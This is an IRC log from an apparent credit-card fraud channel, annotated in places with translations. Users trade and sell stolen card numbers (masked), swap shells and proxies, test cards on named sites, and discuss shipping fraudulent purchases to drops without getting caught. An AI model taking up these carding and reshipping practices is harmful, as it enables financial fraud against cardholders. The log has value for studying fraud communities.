sites :v|Adu :re :Co0lWoRks :ACTION any1 wanna earn +v in :Co0lWoRks :ACTION any1 wanna earn a virgin card, msg me now :Co0lWoRks :ill bbl, since no one wants anything here :Bl4ck_ :-up :Bl4ck_ :? :Bl4ck_ :soory :Bl4ck_ :I`ll go :dlotos33 :anyone have CC? 
:s1z1f :yes :xroach :anyone have or know where i could get license templates or any templates for mag cards ? :s1z1f :do enyone have cc? :dlotos33 :Does any one speak germany? :_CardMan_ :do not think so ... :2red :i speak some german :2red :why? :dlotos33 :What means "ORT" at GERMANY? :2red :city? :dlotos33 :thank you ,my friend :MaTiX_00 :hello :MaTiX_00 :anyone got a proxy for me to use? :dlotos33 :yes :SpRiTe^^^ :HI :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... @ (idem) :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :0,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :0,0 1,1 xxxx xxxx xxxx xxxx :kurky :Any GOOOOOOOD carders here? msg me :kurky :Anyone here got a UK cc??? Msg me :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :][VaMpIrE :hi :][VaMpIrE :wanna trade? :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... @ (idem) :_CardMan_ :m4r1n4ru...salve mah @ m4r1n4ru...hello man :m4r1n4ru :-op :xroach :anybody have any dl templates ? cia/fbi/nsa would be cool too :s1z1f :do enybody have cc? :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :s1z1f :do enybody have cc? :[SK]Kane :care aveti un proxy bun de www? @ who has a good www proxy? :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... @ (idem) :SpRiTe^^^ :H :SpRiTe^^^ :ok :m4r1n4ru :-op :s1z1f :do enybody have cc? :s1z1f :do enybody have cc? :dariuss :am yo 1000 :s1z1f :do enybody have cc? :natedogg :i do.. :s1z1f :pls give it to me :natedogg :trade... :natedogg :mgs me.. :s1z1f :pls give it to me :s1z1f :do enybody have cc? 
:natedogg :sizif ---------------banned#no more trade kind..... :s1z1f :do enybody have cc? :s1z1f :pls give it to me :s1z1f :do enybody have cc? :pimpg :yeah :pimpg :if you would like one you have to send me one first :pimpg :then if it approves :s1z1f :ok :pimpg :i will send one to you :pimpg :sound good :pimpg :pm me if you would like me 2 :D1ck :Tota1KaaS join #delusion :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon. :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :) :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon. :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :) :dariuss :Bl4ck_-)) :Bl4ck_ :se man :s1z1f :*** pimpg (~ricky@exo01-ca.example.net) has joined :s1z1f :*** Retrieving :s1z1f : do enybody have cc? :s1z1f : pls give it to me :s1z1f :*** Retrieving :s1z1f :*** natedogg has quit IRC (Signed off) :s1z1f : do enybody have cc? :s1z1f : yeah :s1z1f : if you would like one you have to send me one first :s1z1f : then if it approves :Ghici :re ppl :pimpg :hello :pimpg :would anyone like to trade, i dont go first :D1ck :D4v3 :D1ck :WHEN BACK MSG ME :s1z1f :do enybody have cc? :dariuss :ACTION c ya :m4r1n4ru :Away :m4r1n4ru :I have Returned. :m4r1n4ru :Away :s1z1f :do enybody have cc? :m4r1n4ru :Away :Bon_Jovi :m4r1n4ru :s1z1f :do enybody have cc? :Bon_Jovi :yep :m4r1n4ru :Away :m4r1n4ru :Away :s1z1f :do enybody have cc? :m4r1n4ru :Away :D1ck :hey J4n3 :J4n3 :what's new :p ? :D1ck :server :D1ck :buying :D1ck :but what did j0e say :D1ck :which is good one? :J4n3 :buying ? confirmed ? 
:D1ck :i got 10 domains (Note:: at this point i guess they have closed the deal with the previous CCs) :D1ck ::P :D1ck :freind bought them :D1ck :hreh :D1ck :yup :J4n3 :usay khud sahi nahi patha usnay sirf example try kiya hai aur wo sahi nahi laga usay he himself doesnt know really, he just tried example and it didnt look all right to him :D1ck :example.net sux? :D1ck :oh :J4n3 :great :D1ck :(@J4n3): great :D1ck :? :J4n3 :haha u said friend already bought it ? :D1ck :domains :D1ck ::) :J4n3 :oh :J4n3 :but from where u planning to buy ? :D1ck :kuch samhaj nahi aa rahi cant understand anything :D1ck :where should i buy :D1ck :Server Space: Single Server :D1ck :IP Numbers: 30 :D1ck :Bandwidth: 50 Gigs :D1ck :Services: Level 1 (Included) :D1ck :Monitor: 24/7 Network Monitoring (Included) :D1ck :-------------------------------------------------------------------------------- :D1ck :Payment Plan: $2,182.80 paid Annually :D1ck :Setup Fee: $100.00 :D1ck :-------------------------------------------------------------------------------- :D1ck :Total Startup: $2,282.80 :D1ck :SkyNetWEB Ltd. :D1ck :3500 Boston St. :D1ck :Baltimore Maryland, 21224 :D1ck :Phone: 410.563.6384 :D1ck :Fax: 410.563.5457 :D1ck :Server Space: Single Server :D1ck :IP Numbers: 30 :D1ck :Bandwidth: 50 Gigs :J4n3 :2,828 ? :D1ck :Services: Level 1 (Included) :D1ck :Monitor: 24/7 Network Monitoring (Included) :D1ck :-------------------------------------------------------------------------------- :D1ck :Payment Plan: $2,182.80 paid Annually :D1ck :Setup Fee: $100.00 :D1ck :-------------------------------------------------------------------------------- :D1ck :Total Startup: $2,282.80 :D1ck :SkyNetWEB Ltd. :D1ck :3500 Boston St. :D1ck :Baltimore Maryland, 21224 :D1ck :Phone: 410.563.6384 :D1ck :Fax: 410.563.5457 :D1ck :yeah :D1ck :per year :D1ck ::(? :D1ck :or :? :J4n3 :but he got it about 800 $ total i think with all system p2 400 64 mb ram and 8.4 gb hd :D1ck ::)? 
:m4r1n4ru :Away :D1ck :but :D1ck :that was one month :D1ck :remmeber? :J4n3 :hmm :J4n3 :u mean thats all for one year ? :J4n3 :and u gonna pay for it ? :D1ck :tell me :D1ck :what should i do? :D1ck :i`m confewsed (Note:: you mean "confused"... kiddie) :J4n3 :yaar aaj raath tak wait karlo dude, wait till tonight :J4n3 :let me ask some more ppl :D1ck :oki :J4n3 :teeek haina ? it's ok with you, right? :J4n3 :i'll ask miller too :D1ck :oki :D1ck :ok :D1ck :my budget is 170-200/month :J4n3 :hmm k :D1ck :>Domain Name 1....: example.com :D1ck :>Domain Name 2....: example.com :D1ck :>Domain Name 3....: example.com :D1ck :>Domain Name 4....: example.com :D1ck :>Domain Name 5....: example.com :D1ck :>Domain Name 6....: example.com :D1ck :>Domain Name 7....: example.com :D1ck :>Domain Name 8....: example.com :D1ck :>Domain Name 9....: example.com :D1ck :>Domain Name 10...: example.com :D1ck :>Total............: $649.50 :J4n3 :oh already registered ? :D1ck :yup :J4n3 :how many years ? :D1ck :1 :J4n3 :thats expensive :J4n3 :wait :D1ck :who cares :D1ck :its cared :J4n3 :let me check :J4n3 :oh :J4n3 :then its ok but wait :D1ck :oki :D1ck :(Sephirot): I need help , SOme one can help me :J4n3 :heh :D1ck :=p :J4n3 :oye :D1ck :? :J4n3 :u could got those 10 domain for 2 years at 300 $ and for 5 years at 750 $ :D1ck :kewl :D1ck :from where? :J4n3 :dotster :D1ck :dotster.com :D1ck :? :J4n3 :1 year: $15 2 year: $30 :J4n3 :5 year: $75 10 year: $150 :J4n3 ::) :J4n3 :yeah :D1ck :cool :D1ck ::P :J4n3 :we'll get more from there :D1ck :oki :D1ck :;) :D1ck :yaar dude :D1ck :i want the server :D1ck :b4d :D1ck :kuch samhaj nahin aa rahi cant understand anything :J4n3 :haha jald baazi math karo haha, dont make haste :D1ck :oye who could make a kewl kewl kewl webpage for webhosting and shell accounts? 
:m4r1n4ru :Away :J4n3 :coz u going to pay from ur pocket :D1ck :lol oki :J4n3 :zara ache thara maaloom karnay do let's locate some good chap :D1ck :ok;) :J4n3 :page design karnay ka masla nahi wo hojayega dont worry dont worry about the page design problem, it shall be done :D1ck :oki kewl :D1ck ::) :D1ck :oye :J4n3 :i'm gonna open a cosmetics shop at tariq road :p :D1ck :1pani nay apna server liya tha or rent? has j0e bought the server or rented it? (Note:: aek in hindi/urdu - pronounce: ache... means one. so 1pani would be j0e that they always refer to) :J4n3 :yea ? :J4n3 :liya tha had bought it :D1ck :kewl hehe :D1ck ::/ :D1ck ::/ :J4n3 :agar thum kaho tho j0e kee baath karwatha hon thum say if you say so, i can tell you j0e's deal :D1ck :oh :J4n3 :usay kahonga thumain call karday i will ask him to call you :J4n3 :ok ? :D1ck :ok :D1ck :sure :D1ck ::) :D1ck :but after 9 :D1ck :but after 9 pm :J4n3 :teeek hai phir khud hee pooch lena sub kuch ok then just ask him everything yourself :D1ck :coz i`ll be sleeping :J4n3 :hmm ok :D1ck :k;/ :D1ck :;/ :J4n3 ::) :J4n3 :tariq road , cosmetic shop, kewl kewl bachiyan *wink* bachiyan = chicks :D1ck :lol :D1ck :hahahaha :J4n3 :hehe yeah :J4n3 :have u seen that new building dolmen mall ? :D1ck ::P :D1ck :nop :m4r1n4ru :Away :J4n3 :hmm phir dekhna , its kewl and most beautiful market in karachi hmmm then take a look at it, it's cool and most beautiful market in karachi :J4n3 :yaar give me a kewl host , aisa jis main psybnc chalaon aur crash na ho, meray ziyad thar roots main make command work nahi kartha :( dude, give me a cool host, such that if we run psybnc on it, it doesnt crash. 
(Note:: i am having problems with some urdu words, but the word-by-word translation for the rest of it is: meray = mine main = in nahi = doesnt kartha = happens the last part is.."make command doesnt work in this") :D1ck ::)) :D1ck :oh :D1ck :i will send u psybnc-compiled :D1ck :when i boot :D1ck ::) :J4n3 :oh then its kewl :) :J4n3 :tight :J4n3 :for sparc na ? :D1ck :yeps :J4n3 :great waiting ... :D1ck :abey abhi ruk heheheh hey wait for now heheheh :D1ck :i am tlking to the person for col :D1ck ::P :D1ck ::pPpp :J4n3 :haha ruka huwa hon jub boot karo tho daydena hehe haha, i am waiting. when you boot then give it up hehe
-=- Day 13 June 16 :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :D1ck! :Anyone have any "Gold-Line" Canadian Calling card #'s ?? :m4r1n4ru! :Away :[4g3nt]! :anyone can tell how to use a company credit card ???? :m4r1n4ru! :Away :TanTouze! :hi goober... oops wrong window :Ricky! :if someone would like to xchange cards contact me :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! 
:damn it, im tired of all this shit :Co0lWoRx! :ok? :Ricky! :ii have 2 cards i will trade :Ricky! :i dont go first :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :ABA! :Anyone want to trade cards? :ABA! :Anyone want to trade cards? :m4r1n4ru! :Away :ABA! :Anyone want to trade cards? (msg me now) :AlfonsoD! :im trading too :ABA! :msg me AlfonsoD :AlfonsoD! :anyone trading? :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :ABA! :Anyone trading cards? :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :[4g3nt]! :yo :[4g3nt]! :is a master card a 16 digit or 13 ? :ABA! :16 :D4r1u55! :? :ABA! :xxxx/xxxx/xxxx/xxxx :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :D4r1u55! :wow :D4r1u55! :ABA :D4r1u55! :look here :D4r1u55! :[10:24] Not Approved: Customer information invalid. :D4r1u55! :[10:24] Not Approved: Invalid Credit Card Number. :D4r1u55! :u give me 2 cc's.but are not viabils :D4r1u55! :[10:11] Dick xxxxxxx :D4r1u55! :[10:11] xxx St Example St :D4r1u55! :[10:11] Somewhere US :ABA! :I gave you two working CCs :ABA! :then :ABA! :you try to send me :ABA! :some bullshit :D4r1u55! :10:11] 10320 :D4r1u55! :[10:11] 06/200x :D4r1u55! :[10:11] Mastercard. :D4r1u55! :[10:11] xxxx xxxx xxxx xxxx :D4r1u55! :[10:11] . :ABA! :1.2meg html file :D4r1u55! :[10:11] John Salvo :ABA! :fucking thief :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :D4r1u55! :[10:11] 1175 Example Ave :D4r1u55! :[10:11] 33146 :D4r1u55! :[10:11] VISA :D4r1u55! :10:11] VISA :D4r1u55! :[10:11] 12/200x :D4r1u55! :[10:11] xxxxxxxxxxxxxxxx :D4r1u55! :and that's all :ABA! :you lame gimp :ABA! :youve got them the wrong way round :ABA! :thief :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :m4r1n4ru! :Away :D4r1u55! :that two cc's u send to me :D4r1u55! :and are'nt good :D4r1u55! :dont work :D4r1u55! :try to understand :D4r1u55! :whatever :[4g3nt]! :how can i card a company cc? :ABA! 
:No one trade with D4r1u55
:ABA! :Hes a ripper
:[4g3nt]! :hihi
:[4g3nt]! :anyone can tell me how to use a company owned cc??
:m4r1n4ru! :Away
:Emy__! :I need some Cc `z (Visa)
:Emy__! :...
:ABA! :Anyone want to trade cards, msg me.
:Emy__! :I need some credit cards .... Visa
:ABA! :Emy MSG me then
:m4r1n4ru! :Away
:D4r1u55! :ACTION leaving, bye
:J4n3! :nettlink
:ABA! :ANYONE want to trade cards?
:Emy__! :I need some credit cards .... Visa
:ABA! :Message me then you fucking idiot
:ABA! :how many more times
:m4r1n4ru! :Away
:2red! :ACTION is selling virgin credit cards, /msg me for deal.
:ABA! :ANYONE want to trade cards? Msg me
:ABA! :ANYONE want to trade cards? Msg me
:[4g3nt]! :fuck ABA <<< ripper
:[4g3nt]! :fuck ABA <<< ripper
:[4g3nt]! :fuck ABA <<< ripper
:Emy__! :I need some credit cards .... Visa
:m4r1n4ru! :Away
:ABA! :ANYONE want to trade cards? Msg me
:ABA! :ANYONE want to trade cards? Msg me
:m4r1n4ru! :Away
:Emy__! :anybody want to give me a cc ??
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:ABA! :Anyone want to trade cards?
:sunfire! :
:ABA! :Anyone want to trade cards?
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:connex! :anyone can help me to buy a shell?
:m4r1n4ru! :Away
:m4r1n4ru! :I have Returned.
:m4r1n4ru! :-op
:sunfire! : :-)
:|DONNIE|! :ne1 have BNC...i have virgin..
:|DONNIE|! :lets trade
:DuXO! :hi to all
:Razzorz! :anyone have bnc
:Razzorz! :anyone have bnc?
:Razzorz! :please tell me about bnc
:DuKso! :hi anyone alive?
:2red! :nope
:DuKso! :how are u 2red :)
:DuKso! :where are u from?
:2red! :<- mortie/lita
:DuKso! :hi man
:DuKso! ::)
:DuKso! :what are u doing:)
:2red! :nothing
:2red! :just listening to music
:Nic[EQ]! :ACTION is trading Visas and MCs, looking for more or for shells
:Emy__! :I need some cc `s (I do not have any )
:FooDSt4mP! :anybody have any visa's? i need to get a plane tick for a chick who's being abused by her husband
:FooDSt4mP! :ill trade shells and dialup accounts for a visa/cc
:[St0rM]! :hahahah
:FooDSt4mP! :dude its not funny
:FooDSt4mP! :its sad
:FooDSt4mP! :i know it sounds like good bs for a card but its not..
:MonTs! :what sort of shells?
:FooDSt4mP! :aragorn.example.net
:FooDSt4mP! :its a linux box.. rh 6.1... 6 bg's... 250 meg quota...
:MonTs! :how many BG process?
:FooDSt4mP! :redundant t3 conn
:FooDSt4mP! :6 bg's
:MonTs! :what's the http address?
:FooDSt4mP! :no http.. its a private shell off a friends companies box
:FooDSt4mP! :example.net is the isp
:FooDSt4mP! :aragorn.example.net is the telnet addy
:FooDSt4mP! :i just need some cc to get a damn ticket for this girl man
:FooDSt4mP! :msg me if you wanna trade
:pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
:pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
:2red! :pFFt--
:Neon! :Have some cc...
:pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
:pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
:2red! :we hear you
:2red! :stop it
:pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
:pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
:pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
:pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
:kurky! :I need someone to do me a favour....
:kurky! :ull get a few virgin visa's
:m4r1n4ru! :-join #rocarding
:m4r1n4ru! :-save
:glipy! :bah
:glipy! :can someone tell me too a site where I can buy mobile phones
:glipy! :hap
:glipy! :?
:^W! :ACTION is trading ccz msg me for trade
:wizz! :hey tabacu
:TanTouze! :ok I'm here, now what were you saying?
:NiCeBoY! :ello
:NiCeBoY! :wers coolworx?
:Mendoza! :hey . Ibill is cardable?
:DuXo! :hi to all
:DuXo! :how are we today
:NiCeBoY! :ello duxo
:ABA! :Anyone want to trade cards? MSG me
:DuXo! :npn msg me
:ABA! :Anyone want to trade cards? MSG me
:NiCeBoY! :
:DuXo! :any trade cc
:ABA! :Anyone want to trade?
:DuXo! :me :)
:ABA! :heh
:ABA! :again?
:DuXo! ::))
:DuXo! :yes but do u have with the phone number too?
:lkd1! :i have
:ABA! :no, just make one up innit :P
:DuXo! :lkd1 :)
:DuXo! :ripper:)
:DuXo! :he just leave the channel :))
:ABA! :ripper?
:DuXo! ::)
:ABA! :I just traded wif him :P
:DuXo! :aND?
:DuXo! ::)
:DuXo! :he gaved u valid?
:DuXo! :i haven`t trade..
:ABA! :I verified
:DuXo! :but he don`t wanted to trade with me .....
:ABA! :before I gave him #
:DuXo! :becasue he thinked...
:DuXo! :im ripper
:2red! :duxo :P
:DuXo! :with +v
:ABA! :heh
:ABA! :ive been ripped so many bloody times
:ABA! :if they dont give me first
:ABA! :I dont trade ever
:DuXo! :ok....
:ABA! :cos ive been ripped so many times
:ABA! :about 10 times wif cards
:ABA! :3 shells
:ABA! :etc
:2red! :tss
:2red! :is that supposed to be something?
:2red! :i got ripped off 40 virgins in one deal once
:ABA! :40 virgins what?
:2red! :40 virgin cards
:ABA! :Drake``: Trade?
:ABA! :ic
:ABA! :and when some little foreign pissant lamer
:ABA! :steals from you
:Drake``! :trade what?
:ABA! :then runs off
:ABA! :Drake``: Cards
:ABA! :it makes you wanna bloody cry
:ABA! :and beat your comp
:ABA! :innit
:2red! :where are you from npn, romania?
:ABA! :no uk
:2red! :ok
:2red! :sweden here
:ABA! :england
:2red! :interested in UK virgins?
:ABA! :leet
:ABA! :hmmm
:ABA! :yup
:2red! :i got plenty of international virgins
:2red! :and US ofcourse
:ABA! :quick tho
:ABA! :cos i gtg real soon
:2red! :err?
:2red! :quick though what
:ABA! :trade quick
:ABA! :get on wif it
:ABA! :cos i gtg
:2red! :why would i trade virgins?
:ABA! :no
:ABA! :like i gib you summat else
:2red! :hehe
:2red! :i sell cards dear.
:ABA! :oh dear
:ABA! :so
:ABA! :what do you want for it
:2red! :money
:ABA! :how much?
:2red! :depends on how many you want
:ABA! :10
:2red! :100 dollars
:ABA! :fuck me
:2red! :?
:ABA! :(please)
:ABA! :i aint got 100$s
:2red! :thats what it costs
:2red! :thats how it is :)
:hhkrgb! :romania anyone?
:Bl4ck_! :yes
:ABA! :0mg
:ABA! :I dont fucking believe this
:ABA! :that fool
:ABA! :DuXo just ripped my card
:ABA! :and ran
:2red! :you surprised or something?
:ABA! :erm
:ABA! :yes
:ABA! :hes an op
:2red! :so?
:ABA! :and ops dont do that kind of shit
:ABA! :ive been trading here
:ABA! :for about
:ABA! :6 months
:ABA! :and no ops ever done that shit
:2red! :thats interesting
:2red! :cause i havent seen you areound much before
:ABA! :Ive never seen you either
:m4r1n4ru! :ABA can you send me a log man ?
:2red! :my usual nick is mortie or lita
:ABA! :m4r1n4ru yea, when I get back
:ABA! :2red: ive seen the nick lita
:ABA! :ages ago
:m4r1n4ru! :ok send me log please
:ABA! :I need dinner
:t4b4cu! :huh
:2red! :duxo
:Piano2! :what?
:t4b4cu! :so taht's lita
:DuXo! :it`s me..
:Bl4ck_! :t4b4cu?
:2red! :im lita yeah
:t4b4cu! :always changing nicks
:t4b4cu! :hhe
:DuXo! :i know..
:Bl4ck_! ::>>
:2red! :doesnt matter since i dont trade
:2red! :i just watch you ppl
:DuXo! :hm
:2red! :and obviously an op just ripped?
:DuXo! :npn
:DuXo! :man
:DuXo! :m4r1n4ru
:DuXo! :i haven`t rip him up
:2red! :what happened then?
:DuXo! :man
:DuXo! :he gaved me CCs
:m4r1n4ru! :ya
:m4r1n4ru! :what ?
:DuXo! :2
:DuXo! :and the both where invalid
:DuXo! :we tradeed 340 minutes before
:t4b4cu! :?
:DuXo! :we tradeed 30 minutes before
:DuXo! :he gaved me valid
:t4b4cu! :who ripped?
:DuXo! :and i gaved him valid CC
:DuXo! :man
:DuXo! :becuase i haved +v
:t4b4cu! :who ripped?
:t4b4cu! :i ban anyone who ripps
:t4b4cu! :so ....i'd like to know
:DuXo! :i checked the 2 ccs on www.come.to/tdnga
:DuXo! :the first 2 sex banners..
:DuXo! :i used the first one
:DuXo! :and the CC comed out decliened
:DuXo! :after that
:DuXo! :i checked the CC on www.bonzi.com
:DuXo! :on Internet Boost
:DuXo! :the first one come out and send me Invalid Card...
:DuXo! :and another that the card is not valid anymore...
:DuXo! :tabacu are u here??
:2red! :oh well
:2red! :you kids
:2red! :i never understood the point of trading cards anyway
:t4b4cu! :ahhahaah
:t4b4cu! :looolz
:t4b4cu! :us kids?
:DuXo! :LoL
:t4b4cu! :how old are u my dear?
:2red! :im 20
:2red! :why
:DuXo! :so
:t4b4cu! :lolz
:DuXo! :what will happen?
:t4b4cu! :i'm 20 too
:DuXo! :u know that im a Legit one
:DuXo! :i can prove that man..
:DuXo! :i have never ripped a man
:t4b4cu! :most ppl areound here are about that age
:2red! :i dont see anyone in here as legit
:t4b4cu! :ahhah
:t4b4cu! :what about me?
:2red! :why would i see you as legit?
:t4b4cu! :i have more ccs than anyone here
:t4b4cu! :heh
:2red! :and how many is that?
:t4b4cu! :and i never ripped in my life
:t4b4cu! :about 40.000
:2red! :is it just me or could anyone say that?
:t4b4cu! :anyway....i more hacker than carder
:2red! :same here
:t4b4cu! :that's why i could take this chan over
:t4b4cu! :eheh
:t4b4cu! :with my friends
:hhkrgb! :join/romania
:2red! :taking over a channel doesnt really require any skills.
:hhkrgb! :wops
:t4b4cu! :we flooded from oc48
:t4b4cu! :heh
:t4b4cu! :lolz
:t4b4cu! :it does
:2red! :packeting is for kids
:t4b4cu! ::)
:DuXo! :tabacu
:DuXo! :is everthing ok now?
:t4b4cu! :yeh it is
:DuXo! :ok..
:m4r1n4ru! :hhm
:DuXo! :what?
:m4r1n4ru! :so he ripped or not ?
:DuXo! :no man..
:DuXo! :i telled u i checked the cc
:DuXo! :where is he
:DuXo! :i will talk with him
:DuXo! :and check the CCs again
:DuXo! :and give to the channel
:m4r1n4ru! :ok
:DuXo! :i don`t have the logs....
:DuXo! :to prove right now..
:hhkrgb
:co^digigi! :hekss
:co^digigi! :heks...
:co^digigi! :i have a shell...and wanna trade with calling card
:co^digigi! :serious person msg me
:DuXo! :cool
:Co0lWoRx! :yo
:DuXo! :let`s got to work
:DuXo! :gety
:DuXo! :get
:DuXo! :and try that .
:Co0lWoRx! :damn it
:DuXo! :what the fuck is this :)
:seriuscar! :what did you have in mind about tradi
:seriuscar! :have bnc, proxies and shell....msg me if want to trade
:seriuscar! :have bnc, proxies and shell....msg me if want to trade
:Drake``! :co^digigi left after ripping me
:Drake``! :hehehe
:Co0lWoRx! :yo drake
:seriuscar! :have bnc, proxies and shell....msg me if want to trade
:seriuscar! :have bnc, proxies and shell....msg me if want to trade
:seriuscar! :have bnc, proxies and shell....msg me if want to trade
:MRuiCosta! :ACTION will trade virgin mc and visa for a shell acct that lets me dns host a .net site
:taur! :hi
:taur! :these guys keep quiet and get on with it
:ows
:ows
:ows
:MonTs! :howdy folks?
:xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
:xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
:iDoetS! :gollllllllllllll
:iDoetS! :1 more
:MonTs! :1 more for whom?
:iDoetS! :ceko
:m4r1n4ru! :-join #rocarding
:m4r1n4ru! :-save
:xKurko! :can anyone gimme one fast proxy???
:m4r1n4ru! :-op
:|AmDeAtH! :-op
:|AmDeAtH! :lol hehe
:Reaggyman! :Do sombody now what the program ares do?
:Reaggyman! :whats ares?
:trinix! :sup all?
:Reaggyman! :trinix: do you now what ares is
:trinix! :any one got any tips for ordering stuff to yer own house with out getting caugfht?
:trinix! :caught?
:trinix! :no
:trinix! :sultrix says u guys are the ones to ask
:Reaggyman! :Do you now a program that cracks sex(enter)password?
:trinix! :nope
:Reaggyman! :are you new here?
:trinix! :yeah
:Reaggyman! :me to
:Reaggyman! :nowbody answers
:trinix! :I am from uk
:Reaggyman! :Norway
:trinix! :I need help on how to order to my house with out getting caught
:trinix! :using cc
:Reaggyman! :What?
:Reaggyman! :Order What?
:trinix! :I wanna order stuff yeah but want to order straight to my house in the uk
:Reaggyman! :isent that easy?
:trinix! :hmm not sure
:trinix! :I wanna an abandoned house but can't find any
:Reaggyman! :I dont now
:Reaggyman! :i came here to
:Reaggyman! :i need a cracking program
:trinix! :why dun you just go to www.xxxpassowrds.com
:glipy! :what cracking program
:Reaggyman! :i dont think they got THAT kind of passwords
:Reaggyman! :The name is Ares
:Reaggyman! :Hi sultrix
:trinix! :heya man
:Reaggyman! :i was band for xxxpasswords
:Sultrix! :Hello
:Sultrix! ::-(
:Reaggyman! :Can you help me sultriz
:Reaggyman! :x
:Sultrix! :Can you guys help me i had a few working CC's but the dun work no more cxan anyone throw me few WORKING cc's my way please ?
:Sultrix! :Reaggyman: Sure whatsup ?
:Reaggyman! :Do you now a program that cracks sex(enter)password?
:MonTs! :Reaggyman ....try going to http://www.catfiles.net/adult.htm
:Sultrix! :hmm
:Sultrix! :no idea
:Reaggyman! :Monts: whats that?
:MonTs! :go there and have a look
:Reaggyman! :and this is
:Reaggyman! :password?
:Reaggyman! :Hi tauer
:Tauer! :hi
:Reaggyman! :can you help me?
:Reaggyman! :Do you now a program that cracks sex(enter)password?
:astavista! :lol
:trinix! :shit can anyone slide me some tips?
:tauer! :well
:tauer! :something like that is harder
:trinix! :shit can anyone slide me some tips?
:Reaggyman! :tauer what+
:tauer! :but you can go to a site that gives passwords for sites like that
:trinix! :wtf
:tauer! :or you can register with a card
:Reaggyman! :English plis
:tauer! :lol
:tauer! :u can go to a site thwt give u password
:tauer! :sheet
:tauer! :sorry
:trinix! :wtf
:tauer! :anibody spek romanian?
:trinix! :shit can anyone give me some tips?
:tauer! :what kind of tips?
:tauer! :trinix?
:Sultrix! :in credit card fraud he means
:tauer! :lol
:tauer! :what i am thinking....:)
:Sultrix! :heh
:tauer! :the chanel carding
:trinix! :I wanna send some stuff to my house in the uk, any tips on how to not get caught?
:tauer! :is hard to someone to teel u about theat
:tauer! :in uk?
:tauer! :is verry hard
:trinix! :what?
:tauer! :but u can sendit to me in other country
:trinix! :is hard to someone to teel u about theat <------------ what?
:tauer! :and i can sendit to u
:trinix! :nah
:tauer! :about:I wanna send some stuff to my house in the uk, any tips on how to not get caught?
:xKurko! :I offered that and Im in the UK with a different drop than my house
:trinix! :I have cc of people in USA and wanna buy stuff in the UK and send it to me in my house
:tauer! :i dont write to well in enghlish
:trinix! :any tips?
:tauer! :u can sendit to me in romania and i sendit to u after the pocket arieve to me
:tauer! ::)
:trinix! :nah take to long
:tauer! :lol
:tauer! :is my turn?
:trinix! :besides you might keep it
:tauer! :to ping time out?
:tauer! :food weaponds?
:tauer! :flood
:trinix! :wb bro
:Sultrix! :ta
:Sultrix! :wassup bra
:trinix! :nadda
:trinix! :reading up on some shit
:Sultrix! :cool
:Sultrix! :Has anyone here got any WORKING CC numbers ?
:tauer! :i sell vodoo 3 3000 100$
:tauer! :whith id
:tauer! ::)
:damang! :need some fresh cc
:Sultrix! :me too
:YesIAm! :haha
:trinix! :me too
:Sultrix! :Anyone got any cc numbers that work
:trinix! :answer him god damn it
:YesIAm! :my cc number works
:fus10nx! :nope...
:YesIAm! ::)
:CC-Master! :who trade here?
:fus10nx! :not U
:fus10nx! :Not I
:trinix! :fus10nx yeah....
:CC-Master! :?
:CC-Master! :so
:CC-Master! :anyone for trade round here?
:damang! :shells for fresh cc
:CC-Master! :what shels or ccz?
:damang! :i have shelz
:Sultrix! :Does anyone have any CC's ??
:CC-Master! :ye
:CC-Master! :i have
:CC-Master! :so?
:Sultrix! :that i can have
:YesIAm! :hahaahaha
:Sultrix! :ffs
:damang! :need some fresh cc
:Sultrix! :Can nayone dish some ccs my wya pease
:YesIAm! :If somebody wanted to donate a # he would paste it into the chan
:damang! :i have shelz wana trade w/ cc
:BONI! :hi anyone for trade?
